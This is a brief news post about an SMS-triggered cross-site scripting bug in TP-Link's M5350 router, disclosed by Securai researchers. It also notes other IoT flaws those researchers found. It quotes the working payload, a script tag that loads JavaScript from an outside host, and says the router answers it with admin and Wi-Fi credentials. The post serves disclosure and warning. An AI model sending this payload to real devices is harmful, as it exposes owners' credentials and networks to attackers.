TP-Link’s M5350 3G/Wi-Fi router, has a huge bug, making it extremely insecure.
Sending an SMS to the router containing the following text
<script src=//n.ms/a.js></script>
Results in the device replying with admin username, admin password, its Wifi Name (SSID), and its Wifi password.
It’s unlikely that the vulnerability has been patched, since according to TP-Link’s current firmware download page for the M5350, the most-current version is M5350_V2_140115, released in January 2015.
A German company called Securai descovered the bug, the issue as a cross-site scripting (XSS) bug triggered by an SMS containing the aforementioned attack script
Securai’s Jan Hörsch said he discovered the bug by analysing the modem’s firmware. Hörsch has also been having fun with the other usual Internet-of-Things targets – a Panasonic BM ET200 retina scanner whose web interface could bypass security by sending it crafted JavaScript, and a Startech modem with a hard-coded telnet password.
The bugs were revealed at last week’s Kaspersky Security Analyst Summit.
Anyone owning one of these devices should consider upgrading, and keeping their fingers crossed that the new device doesn’t have similar issues. Unfortunately when it comes to The Internet-of-Things we’re all at the mercy of the developers.